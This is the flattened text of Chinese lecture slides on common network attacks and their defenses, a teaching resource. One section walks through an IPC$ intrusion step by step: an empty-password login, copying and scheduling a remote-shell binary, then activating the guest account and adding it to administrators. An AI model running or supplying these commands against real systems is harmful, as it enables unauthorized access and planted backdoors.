常见网络攻击与防范

常见网络攻击与防范提纲常见的网络攻击方法常用的平安防范措施常见的网络攻击方法19801985199019952000密码猜测可自动复制的代码密码破解利用的漏洞破坏审计系统后门会话劫持擦除痕迹嗅探包欺骗GUI远程控制自动探测扫描拒绝效劳www攻击工具攻击者入侵者水平攻击手法半开放隐蔽扫描控制台入侵检测网络管理DDOS攻击2002高入侵技术的开展采用漏洞扫描工具选择会用的方式入侵获取系统一定权限提升为最高权限安装系统后门获取敏感信息或者其他攻击目的入侵系统的常用步骤端口判断判断系统选择最简方式入侵分析可能有漏洞的效劳获取系统一定权限提升为最高权限安装多个系统后门去除入侵脚印攻击其他系统获取敏感信息作为其他用途较高明的入侵步骤2001年中美黑客大战事件背景和经过4.1撞机事件为导火线4月初，以PoizonB0x、pr0phet为代表的美国黑客组织对国内站点进行攻击，约300个左右的站点页面被修改4月下旬，国内红〔黑〕客组织或个人，开始对美国网站进行小规模的攻击行动，4月26日有人发表了“五一卫国网战〞战前声明，宣布将在5月1日至8日，对美国网站进行大规模的攻击行动。各方都得到第三方支援各大媒体纷纷报道，评论，中旬结束大战PoizonB0x、pr0phet更改的网页中经网数据有限公司中国科学院心理研究所国内某政府网站国内某大型商业网站国内黑客组织更改的网站页面美国劳工部网站美国某节点网站美国某大型商业网站美国某政府网站这次事件中采用的常用攻击手法红客联盟负责人在5月9日网上记者新闻发布会上对此次攻击事件的技术背景说明如下：“我们更多的是一种不满情绪的发泄，大家也可以看到被攻破的都是一些小站，大局部都是NT/Win2000系统，这个行动在技术上是没有任何炫耀和炒作的价值的。〞主要采用当时流行的系统漏洞进行攻击这次事件中被利用的典型漏洞用户名泄漏，缺省安装的系统用户名和密码Unicode编码可穿越firewall,执行黑客指令ASP源代码泄露可远程连接的数据库用户名和密码SQLserver缺省安装微软Windows2000登录验证机制可被绕过Bind远程溢出，Lion蠕虫SUNrpc.sadmind远程溢出，sadmin/IIS蠕虫Wu-Ftpd格式字符串错误远程平安漏洞拒绝效劳(syn-flood,ping)这次事件中被利用的典型漏洞用户名泄漏，缺省安装的系统用户名和密码入侵者利用黑客工具扫描系统用户获得用户名和简单密码这次事件中被利用的典型漏洞Windows2000登录验证机制可被绕过常见的平安攻击方法直接获取口令进入系统：网络监听，暴力破解利用系统自身平安漏洞特洛伊木马程序：伪装成工具程序或者游戏等诱使用户翻开或下载，然后使用户在无意中激活，导致系统后门被安装WWW欺骗：诱使用户访问纂改正的网页电子邮件攻击：邮件炸弹、邮件欺骗网络监听：获取明文传输的敏感信息通过一个节点来攻击其他节点：攻击者控制一台主机后，经常通过IP欺骗或者主机信任关系来攻击其他节点以隐蔽其入侵路径和擦除攻击证据拒绝效劳攻击和分布式拒绝效劳攻击(和)IP地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。获取信息1.收集主机信息

Ping命令判断计算机是否开着，或者数据包发送到返回需要多少时间

Tracert/Tracerout命令跟踪从一台计算机到另外一台计算机所走的路径

Finger和Rusers命令收集用户信息

Host或者Nslookup命令，结合Whois和Finger命令获取主机、操作系统和用户等信息

应用的方法：获取网络效劳的端口作为入侵通道。2.端口扫瞄1.TCPConnect() 2.TCPSYN3.TCPFIN 4.IP段扫瞄5.TCP反向Ident扫瞄 6.FTP代理扫瞄7.UDPICMP不到达扫瞄 7种扫瞄类型：NSS〔网络平安扫描器〕，可执行Sendmail、匿名FTP、NFS出口、TFTP、Host.equiv和Xhost等常规检查。Strobe(超级优化TCP端口检测程序)，可记录指定机器上的所有开放端口，快速识别指定机器上运行的效劳，提示可以被攻击的效劳。SATAN(平安管理员的网络分析工具)，SATAN用于扫描远程主机，发现漏洞，包括FTPD漏洞和可写的FTP目录，NFS漏洞、NIS漏洞、RSH漏洞、Sendmail和X效劳器漏洞等。Jakal扫描器，可启动而不完成TCP连接，因此可以扫描一个区域而不留下痕迹。IdengTCPscan扫描器，可识别指定TCP端口的进程的UID。扫瞄软件举例：3.Sniffer扫瞄原理：sniffer类的软件能把本地网卡设置成工作在“混杂〞〔promiscuous〕方式，使该网卡能接收所有数据帧，从而获取别人的口令、金融帐号或其他敏感机密信息等。方法与对策：1、用交换机替换HUB，交换机是两两接通，比普通HUB平安。2、使用检测的软件，如CPMAntisniff等，检测网络中是否有网卡工作在混杂状态〔根本原理是发送本网中并不存在的MAC地址，看看是否有回应，如有回应，那么说明有计算机网卡工作在混杂模式。〕。一次利用ipc$的入侵过程1.C:\>netuse\\x.x.x.x\IPC$“〞/user:“admintitrators〞

用?流光?扫到的用户名是administrators，密码为“空〞的IP地址2.C:\>copysrv.exe\\x.x.x.x\admin$

先复制srv.exe上去，在流光的Tools目录下3.C:\>nettime\\x.x.x.x

查查时间，发现x.x.x.x的当前时间是2003/3/19上午11:00，命令成功完成。

4.C:\>at\\x.x.x.x11:05srv.exe

用at命令启动srv.exe吧〔这里设置的时间要比主机时间推后〕

5.C:\>nettime\\x.x.x.x

再查查时间到了没有，如果x.x.x.x的当前时间是2003/3/19上午11:05，那就准备开始下面的命令。

6.C:\>telnetx.x.x.x99

这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet效劳！这就要用到ntlm了

一次利用ipc$的入侵过程7.C:\>copyntlm.exe\\\admin$

ntlm.exe也在?流光?的Tools目录中

8.C:\WINNT\system32>ntlm

输入ntlm启动〔这里的C:\WINNT\system32>是在对方计算机上运行当出现“DONE〞的时候，就说明已经启动正常。然后使用“netstarttelnet〞来开启Telnet效劳，接着输入用户名与密码就进入对方了

为了方便日后登陆,将guest激活并加到管理组

10.C:\>netuserguest/active:yes

11.C:\>netuserguest1234

将Guest的密码改为1234

12.C:\>netlocalgroupadministratorsguest/add

将Guest变为Administrator网络监听及防范技术网络窃听是指通过截获他人网络上通信的数据流，并非法从中提取重要信息的一种方法间接性

利用现有网络协议的一些漏洞来实现，不直接对受害主机系统的整体性进行任何操作或破坏隐蔽性

网络窃听只对受害主机发出的数据流进行操作，不与主机交换信息，也不影响受害主机的正常通信网络监听及防范技术

——共享式局域网下共享式局域网采用的是播送信道，每一台主机所发出的帧都会被全网内所有主机接收到一般网卡具有以下四种工作模式：播送模式、多播模式、直接模式和混杂模式网卡的缺省工作模式是播送模式和直接模式，即只接收发给自己的和播送的帧网络监听及防范技术

——共享式局域网下使用MAC地址来确定数据包的流向 假设等于自己的MAC地址或是播送MAC地址，那么提交给上层处理程序，否那么丢弃此数据当网卡工作于混杂模式的时候，它不做任何判断，直接将接收到的所有帧提交给上层处理程序共享式网络下窃听就使用网卡的混杂模式网络监听及防范技术

——共享式局域网下网络监听及防范技术

——交换式局域网下在数据链路层，数据帧的目的地址是以网卡的MAC地址来标识ARP协议实现<IP—MAC>的配对寻址ARP请求包是以播送的形式发出，正常情况下只有正确IP地址与的主机才会发出ARP响应包，告知查询主机自己的MAC地址。局域网中每台主机都维护着一张ARP表，其中存放着<IP—MAC>地址对。网络监听及防范技术

——交换式局域网下ARP改向的中间人窃听A发往B：(MACb，MACa， PROTOCOL，DATA)B发往A：(MACa，MACb， PROTOCOL，DATA)A发往B：(MACx，MACa， PROTOCOL，DATA)B发往A：(MACx，MACb， PROTOCOL，DATA)网络监听及防范技术

——交换式局域网下X分别向A和B发送ARP包，促使其修改ARP表主机A的ARP表中B为<IPb—MACx>主机B的ARP表中A为<IPa—MACx>X成为主机A和主机B之间的“中间人〞网络监听及防范技术

——网络窃听的被动防范

分割网段

细化网络会使得局域网中被窃听的可能性减小

使用静态ARP表

手工输入<IP—MAC>地址对

采用第三层交换方式

取消局域网对MAC地址、ARP协议的依赖，而采用基于IP地址的交换加密

SSH、SSL、IPSec网络监听及防范技术

——网络窃听的主动防范共享式局域网下的主动防范措施伪造数据包 构造一个含有正确目标IP地址和一个不存在目标MAC地址——各个操作系统处理方式不同，一个比较好的MAC地址是FF-FF-FF-FF-FF-FE性能分析 向网络上发送大量包含无效MAC地址的数据包，窃听主时机因处理大量信息而导致性能下降网络监听及防范技术

——网络窃听的主动防范交换式局域网下的主动防范措施监听ARP数据包 监听通过交换机或者网关的所有ARP数据包，与预先建立的数据库相比较定期探测数据包传送路径 使用路径探测程序如tracert、traceroute等对发出数据包所经过的路径进行检查，并与备份的合法路径作比较使用SNMP定期轮询ARP表

IP欺骗及防范技术

——会话劫持一般欺骗会话劫持IP欺骗及防范技术

——会话劫持会话劫持攻击的根本步骤发现攻击目标确认动态会话猜测序列号 关键一步，技术难点使被冒充主机下线 伪造FIN包，拒绝效劳攻击接管会话IP欺骗及防范技术

——会话劫持猜测序列号TCP区分正确数据包和错误数据包仅通过它们的SEQ/ACK序列号选择恰当时间，在数据流中插入一个欺骗包，效劳器将接受这个包，并且更新ACK序列号；然而客户主机仍继续使用老的SEQ序列号，而没有觉察我们的欺骗包IP欺骗及防范技术——防范技术没有有效的方法可以从根本上防范会话劫持攻击所有会话都加密保护——实现困难使用平安协议〔SSH、VPN〕——保护敏感会话对网络数据流采取限制保护措施——被动措施电子邮件欺骗及防范技术

——案例2003年6月初，一些在中国工商银行进行过网上银行注册的客户，收到了一封来自网络管理员的电子邮件，宣称由于网络银行系统升级，要求客户重新填写用户名和密码。这一举动随后被工行工作人员发现，经证实是不法分子冒用网站公开信箱，企图窃取客户的资料。虽然没有造成多大的损失，但是这宗典型的电子邮件欺骗案例当时曾在国内平安界和金融界掀起了轩然大波，刺激人们针对信息平安问题展开了更加深切的讨论。电子邮件欺骗及防范技术

——原理发送邮件使用SMTP〔即简单邮件传输协议〕SMTP协议的致命缺陷：过于信任原那么SMTP假设的依据是：不疑心邮件的使用者的身份和意图伪装成为他人身份向受害者发送邮件可以使用电子邮件客户端软件，也可以远程登录到25端口发送欺骗邮件电子邮件欺骗及防范技术

——防范查看电子邮件头部信息 不仅指出了是否有人欺骗了电子邮件，而且指出了这个信息的来源采用SMTP身份验证机制 使用与POP协议收取邮件时相同的用户名/密码PGP邮件加密 以公钥密码学〔PublicKeyCryptology〕为根底的Web欺骗及防范技术

——概念人们利用计算机系统完成具有平安需求的决策时往往是基于屏幕的显示页面、URL图标、图片时间的先后顺序攻击者创造一个完整的令人信服的Web世界，但实际上它却是一个虚假的复制攻击者控制这个虚假的Web站点，受害者浏览器和Web之间所有网络通信完全被攻击者截获Web欺骗及防范技术

——概念Web欺骗及防范技术

——原理URL地址改写

://@:///攻击者改写Web页中的所有URL地址，使它们指向攻击者的Web效劳器不是真正的Web效劳器<user>:<password>@<host>:<port>/<url-path>Web欺骗及防范技术

——原理欺骗过程用户单击经过改写后的；:///向:///请求文档；:///向:///返回文档；:///改写文档中的所有URL；:///向用户返回改写后的文档Web欺骗及防范技术

——原理隐藏纰漏由于JavaScript能够对连接状态栏写操作，而且可以将JavaScript操作与特定事件绑定在一起。攻击者完全可以将改写的URL状态恢复为改写前的状态。JavaScript、ActiveX等技术使Web欺骗变得更为可信。

Web欺骗及防范技术

——防范技术检查页面的源代码禁用JavaScrip、ActiveX等脚本语言确保应用有效和能适当地跟踪用户 会话ID使用尽可能长的随机数教育是非常重要的口令攻击方法与对策：1、限制同一用户的失败登录次数2、限制口令最短长度，要求特权指令使用复杂的字母、数字组合。3、定期更换口令，不要将口令存放到计算机文件中1口令暴力攻击：生成口令字典，通过程序试探口令。2窃取口令文件后解密：窃取口令文件〔UNIX环境下的Passwd文件和Shadow文件〕，通过软件解密。CGI漏洞攻击原理：1.有些CGI程序只是简单地进行传递，不对内容进行过滤，攻击者就可能通过页面提交带有危险指令的脚本代码提交给机器去执行。2.有些CGI能够过滤一些特征数据，但是有些攻击者成心制作一些混乱的字符串骗过检测〔如使用退格字符〕。3.有些管理员把CGI所在的目录设置为可写的，那么攻击者不仅可以修改替换页面，而且也可以通过新脚本为所欲为。对策：严格设置CGI脚本权限，采用平安的CGI。漏洞攻击FTP漏洞攻击漏洞1：对使用的端口号没有任何限制，可以使用TCP提供给其他效劳的任意端口，这就使攻击者利用FTP攻击其他效劳。FTP效劳器被当作攻击武器使用了。防范措施是设置效劳器最好不要建立端口号在1024以下的连接，其次禁止FTP代理。漏洞2：FTP标准允许无限次输入密码。防范措施是建议效劳器限制尝试输入正确指令的次数，另外在一次登录失败后应暂停几秒来削减暴力攻击的有效性。漏洞3：分配端口号时，通常按增序分配。防范措施是让系统改为使用随机分配端口号的方法。缓冲区溢出攻击在c语言中，下面程序将造成缓冲区溢出：charbuffer[10];strcpy(buffer,str);或者Sprintf(buffer,〞thisisatest.〞);后果：普通的缓冲区溢出并不会产生平安问题，只有将溢出送到能够以root权限运行命令的区域才会产生危害，最常见的方法是在溢出区域运行一个shell，再通过shell执行其他的命令。对策：经常注意升级版本或下载补丁。例如：IISISAPI.Printer的缓冲区溢出攻击软件：://://补丁：release.asp?ReleaseID=29321拒绝效劳攻击〔DoS〕SYN（我可以连接吗？）ACK（可以）/SYN（请确认！）攻击者受害者伪造地址进行SYN请求为何还没回应就是让你白等不能建立正常的连接拒绝效劳攻击利用系统缺陷攻击OOB攻击耗尽连接攻击利用放大原理Smurf攻击利用放大系统攻击分布式拒绝效劳攻击DDoS1.OOB攻击〔OutofBand〕原理：攻击者是利用Windows下微软网络协定NetBIOS的一个例外处理程序OOB〔OutofBand〕的漏洞。只要有人以OOB的方式，通过TCP/IP传递一个小小的包到某个IP地址的某个开放的受端上〔一般为139〕。对象：使没有防护或修订的win95/nt系统瞬间当机。工具：Ssping、Teardrop(泪滴)、Trin00、Targe3这些攻击都是利用系统的漏洞，因此补救的方法是升级或下载补丁对策2.耗尽连接攻读LAND攻击：向被攻击者发送一个个源地址和目标地址都被设置成为被攻击者的地址的SYN包，导致被攻击者自己与自己建立一个空连接，直到超时。TCP/SYN攻击：攻击者向目标主机不断发送带有虚假源地址的SYN包，目标主机发送ACK/SYN回应，因为源地址是虚假的，所以不会收到ACK回应，导致消耗大量资源等待ACK上，直止系统资源耗尽。这些攻击都是利用系统的漏洞，因此补救的方法是升级或下载补丁对策Smurf攻击攻击者用播送的方式发送回复地址为受害者地址的ICMP请求数据包，每个收到这个数据包的主机都进行回应，大量的回复数据包发给受害者，导致受害主机崩溃。Smurf攻击原理利用放大系统攻击某些类型的操作系统，在一定情况下，对一个请求所返回的信息比请求信息量大几十倍〔如Macintosh〕，攻击者伪装成目标主机进行请求，导致大量数据流发向目标主机，加重了攻击效果。DoS攻击技术——DDoS技术分布式拒绝效劳攻击攻击者在客户端通过telnet之类的常用连接软件，向(master)主控端发送发送对目标主机的攻击请求命令。主控端(master)侦听接收攻击命令，并把攻击命令传到分布端，分布端是执行攻击的角色，收到命令立即发起flood攻击。DDoS攻击原理特洛伊木马木马不同于病毒，但经常被视作病毒处理，随计算机自动启动并在某一端口进行侦听；木马的实质只是一个通过端口进行通信的网络客户/效劳程序特洛伊木马的种类远程控制型输出shell型信息窃取型其它类型Netbus客户端程序NetBus传输NetBus使用TCP建立会话。缺省情况下用12345端口进行连接，12346端口进行数据传输跟踪NetBus的活动比较困难。可以通过检查12346端口数据来确定许多类似的程序使用固定的端口，你可以扫描整个的网络监测可疑的活动。简单方法netstat-an反弹型特洛伊木马可穿透防火墙，控制局域网机器效劳器端主动发起连接，控制端监听80端口自动上线通知Email发送读取主页空间的某个文件网络神偷、灰鸽子、魔法控制解决方法安装防病毒软件和个人防火墙检查可疑的进程和监听端口提高平安警惕性TCP/IP的每个层次都存在攻击TelnetSMTPDNSFTPUDPTCPIP以太网无线网络SATNETARPNET应用程序攻击拒绝服务攻击数据监听和窃取硬件设备破坏电磁监听混合型、自动的攻击

WorkstationViaEmailFileServerWorkstationMailServerInternet混合型攻击:蠕虫WebServerViaWebPageWorkstationWebServerMailGateway攻击的开展趋势防病毒防火墙入侵检测风险管理攻击的开展趋势漏洞趋势严重程度中等或较高的漏洞急剧增加,新漏洞被利用越来越容易(大约60%不需或很少需用代码)混合型威胁趋势将病毒、蠕虫、特洛伊木马和恶意代码的特性与效劳器和Internet漏洞结合起来而发起、传播和扩散的攻击,例：红色代码和尼姆达等。主动恶意代码趋势制造方法：简单并工具化技术特征：智能性、攻击性和多态性,采用加密、变换、插入等技术手段巧妙地伪装自身，躲避甚至攻击防御检测软件.表现形式：多种多样,没有了固定的端口，没有了更多的连接,甚至开展到可以在网络的任何一层生根发芽，复制传播，难以检测。受攻击未来领域即时消息：MSN,Yahoo,ICQ,OICQ等对等程序(P2P)移动设备常见的平安防范措施常用的平安防范措施物理层网络层路由交换策略VLAN划分防火墙、隔离网闸入侵检测抗拒绝效劳传输加密系统层漏洞扫描系统平安加固SUS补丁平安管理应用层防病毒平安功能增强管理层独立的管理队伍统一的管理策略

访问控制

认证

NAT

加密

防病毒、内容过滤流量管理常用的平安防护措施－防火墙入侵检测系统FirewallInternetServersDMZIDSAgentIntranet监控中心router攻击者发现攻击发现攻击发现攻击报警报警IDSAgent漏洞扫描系统Internet地方网管scanner监控中心地方网管地方网管地方网管地方网管市场部工程部router开发部InternetServersFirewall漏洞扫描产品应用系统平安加固根本平安配置检测和优化密码系统平安检测和增强系统后门检测提供访问控制策略和工具增强远程维护的平安性文件系统完整性审计增强的系统日志分析系统升级与补丁安装Windows系统平安加固使用Windowsupdate安装最新补丁；更改密码长度最小值、密码最长存留期、密码最短存留期、帐号锁定计数器、帐户锁定时间、帐户锁定阀值，保障帐号以及口令的平安；卸载不需要的效劳；将暂时不需要开放的效劳停止；限制特定执行文件的权限；设置主机审核策略；调整事件日志的大小、覆盖策略；禁止匿名用户连接；删除主机管理共享；限制Guest用户权限；安装防病毒软件、及时更新病毒代码库；安装